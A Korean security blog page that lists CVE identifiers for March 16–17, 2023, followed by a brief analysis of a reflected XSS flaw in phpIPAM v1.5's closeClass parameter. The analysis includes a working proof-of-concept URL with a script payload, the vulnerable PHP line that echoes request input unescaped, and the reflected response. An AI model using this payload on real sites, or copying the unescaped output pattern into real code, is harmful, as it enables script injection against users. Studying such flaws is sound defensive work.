반응형
datetime subject id link
2023-03-17 01:00:03.375156 (Remote Attack) CVE-2023-27789 https://cve.report/CVE-2023-27789
2023-03-17 01:00:03.375726 (Remote Attack) CVE-2023-27788 https://cve.report/CVE-2023-27788
2023-03-17 01:00:03.376233 (Remote Attack) CVE-2023-27787 https://cve.report/CVE-2023-27787
2023-03-17 01:00:03.376771 (Remote Attack) CVE-2023-27786 https://cve.report/CVE-2023-27786
2023-03-17 01:00:03.377284 (Remote Attack) CVE-2023-27785 https://cve.report/CVE-2023-27785
2023-03-17 01:00:03.377797 (Remote Attack) CVE-2023-27784 https://cve.report/CVE-2023-27784
2023-03-17 01:00:03.378317 (Remote Attack) CVE-2023-27783 https://cve.report/CVE-2023-27783
2023-03-17 01:00:03.378834 (Remote Attack, PHP) CVE-2023-27711 https://cve.report/CVE-2023-27711
2023-03-17 01:00:03.379339 (Remote Attack, PHP, SQL injection) CVE-2023-27709 https://cve.report/CVE-2023-27709
2023-03-17 01:00:03.379859 (Remote Attack, PHP, SQL injection) CVE-2023-27707 https://cve.report/CVE-2023-27707
2023-03-17 01:00:03.380362 (Remote Attack) CVE-2023-27131 https://cve.report/CVE-2023-27131
2023-03-17 01:00:03.380876 (Remote Attack) CVE-2023-27130 https://cve.report/CVE-2023-27130
2023-03-17 01:00:03.381375 (Remote Code Execution, PHP) CVE-2023-27037 https://cve.report/CVE-2023-27037
2023-03-17 01:00:03.381894 (Remote Attack) CVE-2023-26769 https://cve.report/CVE-2023-26769
2023-03-17 01:00:03.455557 (Remote Attack) CVE-2023-26768 https://cve.report/CVE-2023-26768
2023-03-17 01:00:03.456167 (Remote Attack) CVE-2023-26767 https://cve.report/CVE-2023-26767
2023-03-17 02:00:03.599063 (GraphQL) CVE-2023-28104 https://cve.report/CVE-2023-28104
2023-03-17 02:00:03.599937 (Remote Code Execution) CVE-2023-27040 https://cve.report/CVE-2023-27040
2023-03-17 03:00:04.665399 (Docker) CVE-2023-28109 https://cve.report/CVE-2023-28109
2023-03-17 03:00:04.666091 (PHP, SQL injection) CVE-2023-27041 https://cve.report/CVE-2023-27041
2023-03-17 03:00:04.666687 (Kubernetes) CVE-2023-28110 https://cve.report/CVE-2023-28110
2023-03-17 06:00:05.259798 (Code Injection) CVE-2023-0598 https://cve.report/CVE-2023-0598
2023-03-17 07:00:04.967244 (XSS) CVE-2023-27494 https://cve.report/CVE-2023-27494
2023-03-17 07:00:04.969417 (Remote Code Execution) CVE-2022-43605 https://cve.report/CVE-2022-43605
2023-03-17 07:00:04.970018 (Remote Code Execution) CVE-2022-43604 https://cve.report/CVE-2022-43604
2023-03-17 07:00:04.970580 (sqlite) CVE-2022-43441 https://cve.report/CVE-2022-43441
2023-03-17 08:00:07.178085 (XSS) CVE-2023-27059 https://cve.report/CVE-2023-27059
2023-03-17 14:00:04.465122 (OpenSSH) CVE-2023-28531 https://cve.report/CVE-2023-28531
2023-03-17 17:00:05.775902 (PHP, SQL injection, Critical) CVE-2023-1455 https://cve.report/CVE-2023-1455
2023-03-17 17:00:05.776520 (SQL injection, Critical) CVE-2023-1454 https://cve.report/CVE-2023-1454
2023-03-17 17:00:05.777117 (Critical) CVE-2023-1453 https://cve.report/CVE-2023-1453
2023-03-17 17:00:05.777741 (Critical) CVE-2023-1452 https://cve.report/CVE-2023-1452
2023-03-17 17:00:05.855049 (Critical) CVE-2023-1444 https://cve.report/CVE-2023-1444
2023-03-17 17:00:05.855813 (PHP) CVE-2023-1442 https://cve.report/CVE-2023-1442
2023-03-17 17:00:05.856393 (PHP, SQL injection, Critical) CVE-2023-1441 https://cve.report/CVE-2023-1441
2023-03-17 17:00:05.857352 (PHP, SQL injection, Critical) CVE-2023-1440 https://cve.report/CVE-2023-1440
2023-03-17 17:00:05.858000 (PHP, SQL injection, Critical) CVE-2023-1439 https://cve.report/CVE-2023-1439
2023-03-17 18:00:05.672265 (PHP, Critical) CVE-2023-1460 https://cve.report/CVE-2023-1460
2023-03-17 18:00:05.673872 (PHP, SQL injection, Critical) CVE-2023-1459 https://cve.report/CVE-2023-1459
2023-03-17 19:00:04.374013 (PHP, SQL injection, Critical) CVE-2023-1461 https://cve.report/CVE-2023-1461
2023-03-17 19:00:04.374641 (SQL injection) CVE-2023-1152 https://cve.report/CVE-2023-1152
2023-03-17 21:00:06.073189 (GitHub) CVE-2023-1463 https://cve.report/CVE-2023-1463
2023-03-17 22:00:04.778266 (SQL injection, Critical) CVE-2023-1468 https://cve.report/CVE-2023-1468
2023-03-17 22:00:04.778911 (PHP, Critical) CVE-2023-1467 https://cve.report/CVE-2023-1467
2023-03-17 22:00:04.854546 (SQL injection, Critical) CVE-2023-1466 https://cve.report/CVE-2023-1466
2023-03-17 22:00:04.855390 (PHP, Critical) CVE-2023-1464 https://cve.report/CVE-2023-1464
2023-03-17 23:00:04.871377 (WordPress) CVE-2023-1469 https://cve.report/CVE-2023-1469
2023-03-17 23:00:04.872051 (WordPress) CVE-2023-1172 https://cve.report/CVE-2023-1172
반응형
반응형
datetime subject id link
2023-03-16 00:00:05.676810 (Apache Tomcat) CVE-2023-0100 https://cve.report/CVE-2023-0100
2023-03-16 00:00:05.677639 (SQL injection) CVE-2023-24732 https://cve.report/CVE-2023-24732
2023-03-16 00:00:05.678085 (SQL injection) CVE-2023-24731 https://cve.report/CVE-2023-24731
2023-03-16 00:00:05.678791 (SQL injection) CVE-2023-24730 https://cve.report/CVE-2023-24730
2023-03-16 00:00:05.679308 (SQL injection) CVE-2023-24729 https://cve.report/CVE-2023-24729
2023-03-16 00:00:05.679947 (SQL injection) CVE-2023-24728 https://cve.report/CVE-2023-24728
2023-03-16 00:00:05.754858 (SQL injection) CVE-2023-24726 https://cve.report/CVE-2023-24726
2023-03-16 01:00:03.095222 (SQL injection) CVE-2022-44580 https://cve.report/CVE-2022-44580
2023-03-16 02:00:03.060054 (PHP) CVE-2023-1418 https://cve.report/CVE-2023-1418
2023-03-16 02:00:03.060588 (PHP, SQL injection, Critical) CVE-2023-1416 https://cve.report/CVE-2023-1416
2023-03-16 02:00:03.061097 (PHP, Critical) CVE-2023-1415 https://cve.report/CVE-2023-1415
2023-03-16 02:00:03.061628 (PHP, SQL injection, Critical) CVE-2023-1379 https://cve.report/CVE-2023-1379
2023-03-16 02:00:03.062125 (XSS) CVE-2022-37402 https://cve.report/CVE-2022-37402
2023-03-16 04:00:04.571689 (nginx) CVE-2023-25804 https://cve.report/CVE-2023-25804
2023-03-16 04:00:04.572155 (Command Injection) CVE-2023-24229 https://cve.report/CVE-2023-24229
2023-03-16 06:00:06.078321 (XSS) CVE-2023-26912 https://cve.report/CVE-2023-26912
2023-03-16 07:00:06.163612 (Kubernetes, Critical) CVE-2023-26484 https://cve.report/CVE-2023-26484
2023-03-16 09:00:06.355160 (Remote Code Execution) CVE-2023-28461 https://cve.report/CVE-2023-28461
2023-03-16 09:00:06.356189 (Command Injection, Remote Attack) CVE-2023-28460 https://cve.report/CVE-2023-28460
2023-03-16 09:00:06.358310 (Command Injection) CVE-2023-1389 https://cve.report/CVE-2023-1389
2023-03-16 09:00:06.358937 (Arbitrary Command) CVE-2022-4313 https://cve.report/CVE-2022-4313
2023-03-16 11:00:05.857071 (XSS) CVE-2023-26951 https://cve.report/CVE-2023-26951
2023-03-16 11:00:05.857683 (Command Injection) CVE-2023-25280 https://cve.report/CVE-2023-25280
2023-03-16 12:00:07.555624 (PHP, SQL injection) CVE-2023-26784 https://cve.report/CVE-2023-26784
2023-03-16 12:00:07.556107 (Command Execution) CVE-2023-24795 https://cve.report/CVE-2023-24795
2023-03-16 12:00:07.556611 (Remote Attack) CVE-2023-24760 https://cve.report/CVE-2023-24760
2023-03-16 19:00:04.877055 (XSS) CVE-2022-40699 https://cve.report/CVE-2022-40699
2023-03-16 19:00:04.877582 (XSS) CVE-2022-38971 https://cve.report/CVE-2022-38971
2023-03-16 20:00:05.179500 (XSS) CVE-2022-41554 https://cve.report/CVE-2022-41554
2023-03-16 22:00:04.871453 (GitHub, XSS) CVE-2023-1429 https://cve.report/CVE-2023-1429
2023-03-16 22:00:04.872009 (Arbitrary Command) CVE-2023-24671 https://cve.report/CVE-2023-24671
2023-03-16 23:00:04.968759 (PHP, SQL injection) CVE-2023-27250 https://cve.report/CVE-2023-27250
2023-03-16 23:00:04.969330 (PHP) CVE-2023-1433 https://cve.report/CVE-2023-1433
2023-03-16 23:00:04.969910 (PHP, Critical) CVE-2023-1432 https://cve.report/CVE-2023-1432
2023-03-16 23:00:04.970505 (WordPress) CVE-2023-1431 https://cve.report/CVE-2023-1431
반응형
반응형

ref

배경

  • pipipam 은 open-source web IP address management application 이다.
  • phpipam v1.5 버젼에서 Reflected corss-site scripting공격이 가능한 파라미터가 발견되었다. 해당 파라미터는 closeClass 이고 /subnet-masks/popup.php. 엔트리에서 발견되었다.

분석

테스트

  1. 로그인을 수행
  2. 로그인 이후 아래 공격 코드를 url로 입력
[<https://demo.phpipam.net/app/tools/subnet-masks/popup.php?closeClass=">](https://demo.phpipam.net/app/tools/subnet-masks/popup.php?closeClass=%22%3E)alert("XSS>")

<!-- footer -->
<div class="pFooter">
	<div class="btn-group">
		<button class="btn btn-sm btn-default <?php print @$_REQUEST['closeClass']; ?>"><?php print _('Close'); ?></button>
	</div>
</div>
  • 공격코드로 공격 수행시 브라우져 응답은 다음과 같다.
<!-- footer -->
<div class="pFooter">
	<div class="btn-group">
		<button class="btn btn-sm btn-default "><script>alert("XSS")</script>">Close</button>
	</div>
</div>

패치 방법

반응형

+ Recent posts